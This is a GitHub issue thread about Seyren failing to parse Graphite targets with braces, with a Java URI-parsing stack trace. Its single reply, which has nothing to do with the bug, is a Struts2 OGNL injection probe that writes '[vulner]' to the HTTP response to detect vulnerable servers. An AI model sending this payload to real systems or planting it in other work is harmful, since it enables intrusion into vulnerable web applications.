### ISSUE TITLE
seyren does not cope with {}

### ISSUE THREAD

**Issue by msn** [scobal/seyren#202]
Hi,

Seyren does not seem to be able to cope with graphite targets for the form

a.b.{c,d}

I.e. it seems to consider { and } to be illegal characters? Error seems to be:

18/07/2014 13:24:21.664 [http-bio-8001-exec-4] WARN   o.j.r.p.s.s.ServletContainerDispatcher - Failed to parse request.
 javax.ws.rs.core.UriBuilderException: Failed to create URI: http://127.0.0.1:8001/api/metrics/a.b.{c,d}/total
        at org.jboss.resteasy.specimpl.ResteasyUriBuilder.buildFromValues(ResteasyUriBuilder.java:745) ~[resteasy-jaxrs-3.0.6.Final.jar:na]
        at org.jboss.resteasy.specimpl.ResteasyUriBuilder.build(ResteasyUriBuilder.java:717) ~[resteasy-jaxrs-3.0.6.Final.jar:na]
        at org.jboss.resteasy.plugins.server.servlet.ServletUtil.extractUriInfo(ServletUtil.java:52) ~[resteasy-jaxrs-3.0.6.Final.jar:na]
        at org.jboss.resteasy.plugins.server.servlet.ServletContainerDispatcher.service(ServletContainerDispatcher.java:199) ~[resteasy-jaxrs-3.0.6.Final.jar:na]
        at org.jboss.resteasy.plugins.server.servlet.HttpServletDispatcher.service(HttpServletDispatcher.java:56) [resteasy-jaxrs-3.0.6.Final.jar:na]
        at org.jboss.resteasy.plugins.server.servlet.HttpServletDispatcher.service(HttpServletDispatcher.java:51) [resteasy-jaxrs-3.0.6.Final.jar:na]
        at javax.servlet.http.HttpServlet.service(HttpServlet.java:728) [seyren-1.1.0.jar:na]
        at org.apache.catalina.core.ApplicationFilterChain.internalDoFilter(ApplicationFilterChain.java:305) [seyren-1.1.0.jar:na]
        at org.apache.catalina.core.ApplicationFilterChain.doFilter(ApplicationFilterChain.java:210) [seyren-1.1.0.jar:na]
        at org.apache.catalina.core.StandardWrapperValve.invoke(StandardWrapperValve.java:222) [seyren-1.1.0.jar:na]
        at org.apache.catalina.core.StandardContextValve.invoke(StandardContextValve.java:123) [seyren-1.1.0.jar:na]
        at org.apache.catalina.authenticator.AuthenticatorBase.invoke(AuthenticatorBase.java:472) [seyren-1.1.0.jar:na]
        at org.apache.catalina.core.StandardHostValve.invoke(StandardHostValve.java:171) [seyren-1.1.0.jar:na]
        at org.apache.catalina.valves.ErrorReportValve.invoke(ErrorReportValve.java:99) [seyren-1.1.0.jar:na]
        at org.apache.catalina.valves.AccessLogValve.invoke(AccessLogValve.java:936) [seyren-1.1.0.jar:na]
        at org.apache.catalina.core.StandardEngineValve.invoke(StandardEngineValve.java:118) [seyren-1.1.0.jar:na]
        at org.apache.catalina.connector.CoyoteAdapter.service(CoyoteAdapter.java:407) [seyren-1.1.0.jar:na]
        at org.apache.coyote.http11.AbstractHttp11Processor.process(AbstractHttp11Processor.java:1004) [seyren-1.1.0.jar:na]
        at org.apache.coyote.AbstractProtocol$AbstractConnectionHandler.process(AbstractProtocol.java:589) [seyren-1.1.0.jar:na]
        at org.apache.tomcat.util.net.JIoEndpoint$SocketProcessor.run(JIoEndpoint.java:310) [seyren-1.1.0.jar:na]
        at java.util.concurrent.ThreadPoolExecutor.runWorker(ThreadPoolExecutor.java:1145) [na:1.7.0_51]
        at java.util.concurrent.ThreadPoolExecutor$Worker.run(ThreadPoolExecutor.java:615) [na:1.7.0_51]
        at java.lang.Thread.run(Thread.java:744) [na:1.7.0_51]
Caused by: java.net.URISyntaxException: Illegal character in path at index 38: http://127.0.0.1:8001/api/metrics/a.b.{c,d}/total
        at java.net.URI$Parser.fail(URI.java:2829) ~[na:1.7.0_51]
        at java.net.URI$Parser.checkChars(URI.java:3002) ~[na:1.7.0_51]
        at java.net.URI$Parser.parseHierarchical(URI.java:3086) ~[na:1.7.0_51]
        at java.net.URI$Parser.parse(URI.java:3034) ~[na:1.7.0_51]
        at java.net.URI.<init>(URI.java:595) ~[na:1.7.0_51]
        at org.jboss.resteasy.specimpl.ResteasyUriBuilder.buildFromValues(ResteasyUriBuilder.java:740) ~[resteasy-jaxrs-3.0.6.Final.jar:na]
        ... 22 common frames omitted

Am I doing something wrong here?

Thanks and best wishes,

Daniel

**Comment by fanlu** [comment]
/test.action?redirect:${%23w%3d%23context.get(%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27).getWriter(),%23w.println(%27[vulner]%27),%23w.flush(),%23w.close()}
